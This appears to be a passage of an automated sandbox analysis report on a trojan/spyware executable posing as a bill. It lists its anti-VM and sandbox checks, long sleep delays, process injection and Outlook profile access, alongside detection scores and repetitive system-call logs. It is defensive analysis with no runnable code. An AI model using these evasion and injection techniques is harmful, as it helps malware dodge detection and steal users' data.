                    Source: BILL-OOO566876.exeBinary or memory string: HttpWebRequestMethodIfModifiedSinceDownloadsget_SaveThumbnailsset_SaveThumbnailsget_SaveHTMLset_SaveHTMLget_SaveOriginalFilenamesset_SaveOriginalFilenamesget_PreventDuplicatesset_PreventDuplicatesget_DownloadPathset_DownloadPathget_ScannerDelayset_ScannerDelayget_AllowFileNamesGreaterThan255set_AllowFileNamesGreaterThan255get_fchanWarningset_fchanWarningget_UseThreadNameset_UseThreadName vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: SaveOriginalFilenames vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: SaveThumbnailsSaveHTMLSaveOriginalFilenamesPreventDuplicatesDownloadPathScannerDelayAllowFileNamesGreaterThan255fchanWarningUseThreadNameErrorLogReportWebExceptionWebExceptionWebsiteAddressReportExceptionExceptionIsWriteToFileWriteToFileBuffer vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: chkSaveOriginalFileNames vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: frmSettingstcMainTabControltabDownloadsTabPagenumTimerNumericUpDownlbTimerlbSavePathbtnBrowsechkMoveExistingDownloadsCheckBoxtabApplicationtabAdvancedtabResetbtnUserScriptbtnProtocolbtnSCanbtnSSavechkPreventDuplicateschkSaveOriginalFileNameschkDownloadThumbnailschkDownloadHTMLtxtSavePathchkUseFullBoardNameForTitlechkEnableUpdateschkShowExitWarningchkMinimizeToTraychkShowTrayIconttSettingsToolTipchkSaveDownloadQueueOnExitlbUserAgentchkSilenceErrorschkDisableScannerWhenOpeningSettingstxtUserAgentbtnOpenLocalFilestabRegexlbRegexInfotxtRegexlvRegexchkAllowFileNamesGreaterThan255chkMinimizeInsteadOfExitinglbRegexHintchkResetRegexSettingschkResetAdvancedSettingschkResetApplicationSettingschkResetDownloadSettingsbtnResetSettingschkEnableSettingsResetlbScanDelaySecondschkRetrieveThreadNamebtnSSave_ClickLoadSettingsSaveSettingsbtnBrowse_ClickbtnSCan_ClickbtnOpenLocalFiles_ClicklvRegex_SelectedIndexChangedtxtRegex_TextChangedchkEnableSettingsReset_CheckedChangedbtnResetSettings_Click vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: OriginalFilenamemWu~ vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: BILL-OOO566876.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: 2.2.BILL-OOO566876.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 2.2.BILL-OOO566876.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@1/1
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 2_2_00DCAF3E AdjustTokenPrivileges,
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 2_2_00DCAF07 AdjustTokenPrivileges,
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\BILL-OOO566876.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: BILL-OOO566876.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: BILL-OOO566876.exeVirustotal: Detection: 24%
                    Source: BILL-OOO566876.exeReversingLabs: Detection: 52%
                    Source: unknownProcess created: C:\Users\user\Desktop\BILL-OOO566876.exe 'C:\Users\user\Desktop\BILL-OOO566876.exe'
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess created: C:\Users\user\Desktop\BILL-OOO566876.exe {path}
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess created: C:\Users\user\Desktop\BILL-OOO566876.exe {path}
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: BILL-OOO566876.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                    Source: BILL-OOO566876.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: mscorrc.pdb source: BILL-OOO566876.exe, 00000000.00000002.235301407.00000000093A0000.00000002.00000001.sdmp, BILL-OOO566876.exe, 00000002.00000002.473146526.0000000000FC0000.00000002.00000001.sdmp
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_007E2D3F push es; retf
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_007E2900 push 00000001h; ret
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_007E68FC push es; ret
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_007E26F3 push esp; retf
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_007E24D9 push edx; retf
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_050727D2 push es; ret
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05076289 push FFFFFFB2h; retf
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 2_2_00632D3F push es; retf
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 2_2_00632900 push 00000001h; ret
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 2_2_006326F3 push esp; retf
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 2_2_006368FC push es; ret
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 2_2_006324D9 push edx; retf
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.62974179137
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    barindex
                    Yara detected AntiVM3Show sources
                    Source: Yara matchFile source: Process Memory Space: BILL-OOO566876.exe PID: 1308, type: MEMORY
                    Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeFunction Chain: systemQueried,systemQueried,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,systemQueried,processQueried,processQueried,systemQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                    Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeWindow / User API: threadDelayed 665
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exe TID: 6024Thread sleep time: -31500s >= -30000s
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exe TID: 6040Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exe TID: 4800Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exe TID: 4800Thread sleep count: 665 > 30
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exe TID: 4800Thread sleep time: -19950000s >= -30000s
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exe TID: 4800Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exe TID: 4800Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeThread delayed: delay time: 31500
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeThread delayed: delay time: 30000
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeThread delayed: delay time: 30000
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeThread delayed: delay time: 30000
                    Source: BILL-OOO566876.exe, 00000002.00000002.471992237.0000000000CDD000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllessor Free20191113112613.000000-420\Device\HarddiskVolume2\Device\HarddiskVolume420200930080229.493177-42064-bit
                    Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                    Source: BILL-OOO566876.exe, 00000002.00000002.477494800.0000000005160000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                    Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmpBinary or memory string: vmware
                    Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: BILL-OOO566876.exe, 00000002.00000002.471992237.0000000000CDD000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                    Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmpBinary or memory string: VMWARE
                    Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: BILL-OOO566876.exe, 00000002.00000002.477494800.0000000005160000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                    Source: BILL-OOO566876.exe, 00000002.00000002.477494800.0000000005160000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                    Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                    Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                    Source: BILL-OOO566876.exe, 00000002.00000002.477494800.0000000005160000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 2_2_00F9C948 LdrInitializeThunk,
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    Injects a PE file into a foreign processesShow sources
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeMemory written: C:\Users\user\Desktop\BILL-OOO566876.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeProcess created: C:\Users\user\Desktop\BILL-OOO566876.exe {path}
                    Source: BILL-OOO566876.exe, 00000002.00000002.473566293.0000000001540000.00000002.00000001.sdmpBinary or memory string: Program Manager
                    Source: BILL-OOO566876.exe, 00000002.00000002.473566293.0000000001540000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                    Source: BILL-OOO566876.exe, 00000002.00000002.473566293.0000000001540000.00000002.00000001.sdmpBinary or memory string: Progman
                    Source: BILL-OOO566876.exe, 00000002.00000002.473566293.0000000001540000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
